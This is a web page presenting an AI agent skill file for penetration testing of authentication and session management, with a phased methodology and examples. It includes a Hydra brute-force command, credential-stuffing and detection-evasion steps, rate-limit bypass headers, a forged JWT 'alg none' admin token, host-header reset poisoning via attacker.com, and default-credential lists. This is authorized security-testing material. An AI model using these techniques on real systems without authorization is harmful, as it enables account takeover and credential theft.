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    davila7

    broken-authentication-testing

    davila7/broken-authentication-testing
    Security
    19,892
    2 installs

    About

    SKILL.md

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    About

    This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password...

    SKILL.md

    Broken Authentication Testing

    Purpose

    Identify and exploit authentication and session management vulnerabilities in web applications. Broken authentication consistently ranks in the OWASP Top 10 and can lead to account takeover, identity theft, and unauthorized access to sensitive systems. This skill covers testing methodologies for password policies, session handling, multi-factor authentication, and credential management.

    Prerequisites

    Required Knowledge

    • HTTP protocol and session mechanisms
    • Authentication types (SFA, 2FA, MFA)
    • Cookie and token handling
    • Common authentication frameworks

    Required Tools

    • Burp Suite Professional or Community
    • Hydra or similar brute-force tools
    • Custom wordlists for credential testing
    • Browser developer tools

    Required Access

    • Target application URL
    • Test account credentials
    • Written authorization for testing

    Outputs and Deliverables

    1. Authentication Assessment Report - Document all identified vulnerabilities
    2. Credential Testing Results - Brute-force and dictionary attack outcomes
    3. Session Security Analysis - Token randomness and timeout evaluation
    4. Remediation Recommendations - Security hardening guidance

    Core Workflow

    Phase 1: Authentication Mechanism Analysis

    Understand the application's authentication architecture:

    # Identify authentication type
    - Password-based (forms, basic auth, digest)
    - Token-based (JWT, OAuth, API keys)
    - Certificate-based (mutual TLS)
    - Multi-factor (SMS, TOTP, hardware tokens)
    
    # Map authentication endpoints
    /login, /signin, /authenticate
    /register, /signup
    /forgot-password, /reset-password
    /logout, /signout
    /api/auth/*, /oauth/*
    

    Capture and analyze authentication requests:

    POST /login HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded
    
    username=test&password=test123
    

    Phase 2: Password Policy Testing

    Evaluate password requirements and enforcement:

    # Test minimum length (a, ab, abcdefgh)
    # Test complexity (password, password1, Password1!)
    # Test common weak passwords (123456, password, qwerty, admin)
    # Test username as password (admin/admin, test/test)
    

    Document policy gaps: Minimum length <8, no complexity, common passwords allowed, username as password.

    Phase 3: Credential Enumeration

    Test for username enumeration vulnerabilities:

    # Compare responses for valid vs invalid usernames
    # Invalid: "Invalid username" vs Valid: "Invalid password"
    # Check timing differences, response codes, registration messages
    

    Password reset

    "Email sent if account exists" (secure) "No account with that email" (leaks info)

    API responses

    {"error": "user_not_found"} {"error": "invalid_password"}

    
    ### Phase 4: Brute Force Testing
    
    Test account lockout and rate limiting:
    
    ```bash
    # Using Hydra for form-based auth
    hydra -l admin -P /usr/share/wordlists/rockyou.txt \
      target.com http-post-form \
      "/login:username=^USER^&password=^PASS^:Invalid credentials"
    
    # Using Burp Intruder
    1. Capture login request
    2. Send to Intruder
    3. Set payload positions on password field
    4. Load wordlist
    5. Start attack
    6. Analyze response lengths/codes
    

    Check for protections:

    # Account lockout
    - After how many attempts?
    - Duration of lockout?
    - Lockout notification?
    
    # Rate limiting
    - Requests per minute limit?
    - IP-based or account-based?
    - Bypass via headers (X-Forwarded-For)?
    
    # CAPTCHA
    - After failed attempts?
    - Easily bypassable?
    

    Phase 5: Credential Stuffing

    Test with known breached credentials:

    # Credential stuffing differs from brute force
    # Uses known email:password pairs from breaches
    
    # Using Burp Intruder with Pitchfork attack
    1. Set username and password as positions
    2. Load email list as payload 1
    3. Load password list as payload 2 (matched pairs)
    4. Analyze for successful logins
    
    # Detection evasion
    - Slow request rate
    - Rotate source IPs
    - Randomize user agents
    - Add delays between attempts
    

    Phase 6: Session Management Testing

    Analyze session token security:

    # Capture session cookie
    Cookie: SESSIONID=abc123def456
    
    # Test token characteristics
    1. Entropy - Is it random enough?
    2. Length - Sufficient length (128+ bits)?
    3. Predictability - Sequential patterns?
    4. Secure flags - HttpOnly, Secure, SameSite?
    

    Session token analysis:

    #!/usr/bin/env python3
    import requests
    import hashlib
    
    # Collect multiple session tokens
    tokens = []
    for i in range(100):
        response = requests.get("https://target.com/login")
        token = response.cookies.get("SESSIONID")
        tokens.append(token)
    
    # Analyze for patterns
    # Check for sequential increments
    # Calculate entropy
    # Look for timestamp components
    

    Phase 7: Session Fixation Testing

    Test if session is regenerated after authentication:

    # Step 1: Get session before login
    GET /login HTTP/1.1
    Response: Set-Cookie: SESSIONID=abc123
    
    # Step 2: Login with same session
    POST /login HTTP/1.1
    Cookie: SESSIONID=abc123
    username=valid&password=valid
    
    # Step 3: Check if session changed
    # VULNERABLE if SESSIONID remains abc123
    # SECURE if new session assigned after login
    

    Attack scenario:

    # Attacker workflow:
    1. Attacker visits site, gets session: SESSIONID=attacker_session
    2. Attacker sends link to victim with fixed session:
       https://target.com/login?SESSIONID=attacker_session
    3. Victim logs in with attacker's session
    4. Attacker now has authenticated session
    

    Phase 8: Session Timeout Testing

    Verify session expiration policies:

    # Test idle timeout
    1. Login and note session cookie
    2. Wait without activity (15, 30, 60 minutes)
    3. Attempt to use session
    4. Check if session is still valid
    
    # Test absolute timeout
    1. Login and continuously use session
    2. Check if forced logout after set period (8 hours, 24 hours)
    
    # Test logout functionality
    1. Login and note session
    2. Click logout
    3. Attempt to reuse old session cookie
    4. Session should be invalidated server-side
    

    Phase 9: Multi-Factor Authentication Testing

    Assess MFA implementation security:

    # OTP brute force
    - 4-digit OTP = 10,000 combinations
    - 6-digit OTP = 1,000,000 combinations
    - Test rate limiting on OTP endpoint
    
    # OTP bypass techniques
    - Skip MFA step by direct URL access
    - Modify response to indicate MFA passed
    - Null/empty OTP submission
    - Previous valid OTP reuse
    
    # API Version Downgrade Attack (crAPI example)
    # If /api/v3/check-otp has rate limiting, try older versions:
    POST /api/v2/check-otp
    {"otp": "1234"}
    # Older API versions may lack security controls
    
    # Using Burp for OTP testing
    1. Capture OTP verification request
    2. Send to Intruder
    3. Set OTP field as payload position
    4. Use numbers payload (0000-9999)
    5. Check for successful bypass
    

    Test MFA enrollment:

    # Forced enrollment
    - Can MFA be skipped during setup?
    - Can backup codes be accessed without verification?
    
    # Recovery process
    - Can MFA be disabled via email alone?
    - Social engineering potential?
    

    Phase 10: Password Reset Testing

    Analyze password reset security:

    # Token security
    1. Request password reset
    2. Capture reset link
    3. Analyze token:
       - Length and randomness
       - Expiration time
       - Single-use enforcement
       - Account binding
    
    # Token manipulation
    https://target.com/reset?token=abc123&user=victim
    # Try changing user parameter while using valid token
    
    # Host header injection
    POST /forgot-password HTTP/1.1
    Host: attacker.com
    email=victim@email.com
    # Reset email may contain attacker's domain
    

    Quick Reference

    Common Vulnerability Types

    Vulnerability Risk Test Method
    Weak passwords High Policy testing, dictionary attack
    No lockout High Brute force testing
    Username enumeration Medium Differential response analysis
    Session fixation High Pre/post-login session comparison
    Weak session tokens High Entropy analysis
    No session timeout Medium Long-duration session testing
    Insecure password reset High Token analysis, workflow bypass
    MFA bypass Critical Direct access, response manipulation

    Credential Testing Payloads

    # Default credentials
    admin:admin
    admin:password
    admin:123456
    root:root
    test:test
    user:user
    
    # Common passwords
    123456
    password
    12345678
    qwerty
    abc123
    password1
    admin123
    
    # Breached credential databases
    - Have I Been Pwned dataset
    - SecLists passwords
    - Custom targeted lists
    

    Session Cookie Flags

    Flag Purpose Vulnerability if Missing
    HttpOnly Prevent JS access XSS can steal session
    Secure HTTPS only Sent over HTTP
    SameSite CSRF protection Cross-site requests allowed
    Path URL scope Broader exposure
    Domain Domain scope Subdomain access
    Expires Lifetime Persistent sessions

    Rate Limiting Bypass Headers

    X-Forwarded-For: 127.0.0.1
    X-Real-IP: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Client-IP: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    True-Client-IP: 127.0.0.1
    

    Constraints and Limitations

    Legal Requirements

    • Only test with explicit written authorization
    • Avoid testing with real breached credentials
    • Do not access actual user accounts
    • Document all testing activities

    Technical Limitations

    • CAPTCHA may prevent automated testing
    • Rate limiting affects brute force timing
    • MFA significantly increases attack difficulty
    • Some vulnerabilities require victim interaction

    Scope Considerations

    • Test accounts may behave differently than production
    • Some features may be disabled in test environments
    • Third-party authentication may be out of scope
    • Production testing requires extra caution

    Examples

    Example 1: Account Lockout Bypass

    Scenario: Test if account lockout can be bypassed

    # Step 1: Identify lockout threshold
    # Try 5 wrong passwords for admin account
    # Result: "Account locked for 30 minutes"
    
    # Step 2: Test bypass via IP rotation
    # Use X-Forwarded-For header
    POST /login HTTP/1.1
    X-Forwarded-For: 192.168.1.1
    username=admin&password=attempt1
    
    # Increment IP for each attempt
    X-Forwarded-For: 192.168.1.2
    # Continue until successful or confirmed blocked
    
    # Step 3: Test bypass via case manipulation
    username=Admin (vs admin)
    username=ADMIN
    # Some systems treat these as different accounts
    

    Example 2: JWT Token Attack

    Scenario: Exploit weak JWT implementation

    # Step 1: Capture JWT token
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
    
    # Step 2: Decode and analyze
    # Header: {"alg":"HS256","typ":"JWT"}
    # Payload: {"user":"test","role":"user"}
    
    # Step 3: Try "none" algorithm attack
    # Change header to: {"alg":"none","typ":"JWT"}
    # Remove signature
    eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.
    
    # Step 4: Submit modified token
    Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
    

    Example 3: Password Reset Token Exploitation

    Scenario: Test password reset functionality

    # Step 1: Request reset for test account
    POST /forgot-password
    email=test@example.com
    
    # Step 2: Capture reset link
    https://target.com/reset?token=a1b2c3d4e5f6
    
    # Step 3: Test token properties
    # Reuse: Try using same token twice
    # Expiration: Wait 24+ hours and retry
    # Modification: Change characters in token
    
    # Step 4: Test for user parameter manipulation
    https://target.com/reset?token=a1b2c3d4e5f6&email=admin@example.com
    # Check if admin's password can be reset with test user's token
    

    Troubleshooting

    Issue Solutions
    Brute force too slow Identify rate limit scope; IP rotation; add delays; use targeted wordlists
    Session analysis inconclusive Collect 1000+ tokens; use statistical tools; check for timestamps; compare accounts
    MFA cannot be bypassed Document as secure; test backup/recovery mechanisms; check MFA fatigue; verify enrollment
    Account lockout prevents testing Request multiple test accounts; test threshold first; use slower timing
    Repository
    davila7/claude-code-templates
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